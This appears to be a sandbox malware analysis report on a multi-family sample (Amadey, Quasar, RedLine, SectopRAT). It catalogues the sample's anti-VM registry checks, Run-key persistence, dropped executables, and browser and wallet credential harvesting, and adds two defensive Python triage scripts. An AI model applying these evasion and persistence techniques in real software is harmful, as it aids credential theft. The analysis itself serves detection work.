Malware Analysis Report

2024-10-19 08:35

Sample ID 240731-ehv9yazbla
Target 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e
SHA256 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e
Tags
amadey quasar redline sectoprat 0657d1 exodusmarket.io fed3aa office04 credential_access discovery evasion infostealer persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e

Threat Level: Known bad

The file 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e was found to be: Known bad.

Malicious Activity Summary

amadey quasar redline sectoprat 0657d1 exodusmarket.io fed3aa office04 credential_access discovery evasion infostealer persistence rat spyware stealer trojan

SectopRAT payload

RedLine payload

Quasar payload

Amadey

Quasar RAT

RedLine

SectopRAT

Credentials from Password Stores: Credentials from Web Browsers

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Identifies Wine through registry keys

Checks BIOS information in registry

Loads dropped DLL

Adds Run key to start application

Enumerates connected drives

Blocklisted process makes network request

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Browser Information Discovery

Unsigned PE

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

GoLang User-Agent

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-31 03:56

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-31 03:56

Reported

2024-07-31 03:59

Platform

win10v2004-20240730-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe"

Signatures

Amadey

trojan amadey

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000020001\73b79a2459.exe N/A
N/A N/A C:\Users\Admin\1000029002\84743dcfde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\ProgramData\xpmvhsd\agpphek.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pureee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adada.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dropperrr.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
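The four registry-based signatures above (VirtualBox ACPI table name, BIOS version strings, the Wine key, and the Geo\Nation country value) are individually weak; what makes them useful in triage is that the same dropped binaries (axplong.exe, explorti.exe) perform several of them. The script below is an added example, not part of the sandbox report or of any of the named malware families: it parses rows in the report's own "Description Indicator Process Target" layout, maps each registry path to a check label and ATT&CK technique, and reports processes that performed at least two distinct checks. The sample rows are constructed from the tables above; the RULES table and the threshold of two are the author's assumptions.

```python
import re
from collections import defaultdict

# Constructed sample rows in the report's own "Description Indicator Process Target"
# layout, taken from the registry-based evasion and discovery signatures above.
SAMPLE_ROWS = r"""
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
"""

# One row: <Description> <registry path> <process image> N/A. Both the registry path and
# the image path may contain spaces, so the image is anchored on its drive letter.
ROW_RE = re.compile(
    r"^(Key opened|Key value queried)\s+(\\REGISTRY\\.+?)\s+([A-Za-z]:\\.+?)\s+N/A$"
)

# (case-insensitive fragment of the registry path, label, ATT&CK technique) - assumed mapping
RULES = (
    (r"\acpi\dsdt\vbox__", "virtualbox-acpi", "T1497.001"),      # VirtualBox DSDT table name
    (r"\software\wine", "wine", "T1497.001"),                   # only present under Wine
    (r"\system\systembiosversion", "bios-version", "T1497.001"),
    (r"\system\videobiosversion", "bios-version", "T1497.001"),
    (r"\geo\nation", "geo-nation", "T1614"),                    # country code of the profile
)

def parse_rows(text):
    """Return (description, registry_path, process_image) tuples for rows that match."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            events.append((m.group(1), m.group(2), m.group(3)))
    return events

def classify(events):
    """Map each process image name to the set of (label, technique) checks it performed."""
    per_process = defaultdict(set)
    for _desc, key, image in events:
        name = image.rsplit("\\", 1)[-1].lower()
        for fragment, label, technique in RULES:
            if fragment in key.lower():
                per_process[name].add((label, technique))
    return dict(per_process)

def triage(text, min_checks=2):
    """Processes that performed at least min_checks distinct checks, with their labels."""
    per_process = classify(parse_rows(text))
    return {name: sorted(checks) for name, checks in per_process.items()
            if len(checks) >= min_checks}

if __name__ == "__main__":
    for name, checks in triage(SAMPLE_ROWS).items():
        print(name, [f"{label} ({tech})" for label, tech in checks])
```

On the sample rows only axplong.exe and explorti.exe clear the threshold; RegAsm.exe (the Geo\Nation query) and c5d6d3a173.exe (one BIOS query) do not, which is the intended behaviour: a single registry read of this kind is also made by legitimate installers, so the score should come from the combination.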

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\73b79a2459.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\73b79a2459.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\84743dcfde.exe = "C:\\Users\\Admin\\1000029002\\84743dcfde.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Endpoint Manager = "C:\\Program Files (x86)\\COMODO\\Endpoint Manager\\ITSMAgent.exe" C:\Windows\system32\msiexec.exe N/A
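The three Run-key rows above mix two very different situations: explorti.exe registering payloads that live under C:\Users, and msiexec.exe registering an agent under Program Files during an MSI install. The script below is an added example, not code from the report or from any of the named tools: it parses "Set value (str)" rows in the report's layout, undoes the doubled backslashes the report uses for string data, resolves the hive (\REGISTRY\USER\<SID> is that user's HKCU), and flags entries whose autostart target and writing process both live in user-writable locations. The sample rows are constructed from the table above; the location classes and the risk rule are the author's assumptions.

```python
import re

# Constructed sample rows in the report's "Set value (str) <key> = "<data>" <process> N/A"
# layout, copied from the "Adds Run key to start application" rows above.
SAMPLE_ROWS = r"""
Set value (str) \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\73b79a2459.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\73b79a2459.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\84743dcfde.exe = "C:\\Users\\Admin\\1000029002\\84743dcfde.exe" C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Endpoint Manager = "C:\\Program Files (x86)\\COMODO\\Endpoint Manager\\ITSMAgent.exe" C:\Windows\system32\msiexec.exe N/A
"""

# Groups: full key path, value name under ...\Run\, quoted data, writing process image.
ROW_RE = re.compile(
    r'^Set value \(str\)\s+(\\REGISTRY\\.+?\\Run\\(.+?)) = "(.+?)"\s+([A-Za-z]:\\.+?)\s+N/A$'
)

def unescape(data):
    """The report prints registry string data with doubled backslashes; undo that."""
    return data.replace("\\\\", "\\")

def scope(key):
    k = key.upper()
    if k.startswith("\\REGISTRY\\MACHINE\\"):
        return "HKLM"
    if k.startswith("\\REGISTRY\\USER\\"):
        return "HKCU"   # \REGISTRY\USER\<SID> is that user's HKCU
    return "other"

def location(path):
    """Rough trust class of an executable's location (assumed classes)."""
    p = path.lower()
    if p.startswith("c:\\users\\") or p.startswith("c:\\programdata\\") or "\\temp\\" in p:
        return "user-writable"
    if p.startswith("c:\\program files"):
        return "program-files"
    return "other"

def parse_run_keys(text):
    """One dict per Run-key row, with the data unescaped and the hive resolved."""
    entries = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        key, name, data, writer = m.groups()
        target = unescape(data)
        entries.append({
            "scope": scope(key),
            "name": name,
            "target": target,
            "location": location(target),
            "writer_path": writer,
            "writer": writer.rsplit("\\", 1)[-1].lower(),
            "wow64": "\\WOW6432NODE\\" in key.upper(),   # 32-bit view of HKLM\Software
        })
    return entries

def high_risk(entries):
    """Autostart target in a user-writable path, written by a process that also runs
    from a user-writable path: the pattern of a dropper persisting its payloads."""
    return [e for e in entries
            if e["location"] == "user-writable"
            and location(e["writer_path"]) == "user-writable"]

if __name__ == "__main__":
    for e in parse_run_keys(SAMPLE_ROWS):
        print(e["scope"], e["name"], "->", e["target"], f"[{e['location']}, by {e['writer']}]")
    print("high risk:", [e["name"] for e in high_risk(parse_run_keys(SAMPLE_ROWS))])
```

The msiexec.exe entry is deliberately not flagged by this rule: it is an HKLM\...\WOW6432Node\...\Run value pointing into Program Files, which is what any 32-bit MSI-installed agent looks like, and deciding whether that particular package belongs on the host is a separate question from the dropper's own persistence. To confirm either kind of entry on a live machine, `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and `reg query HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run` show the same value names.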

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\msiexec.exe N/A
N/A N/A C:\Windows\System32\msiexec.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\W: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\msiexec.exe N/A

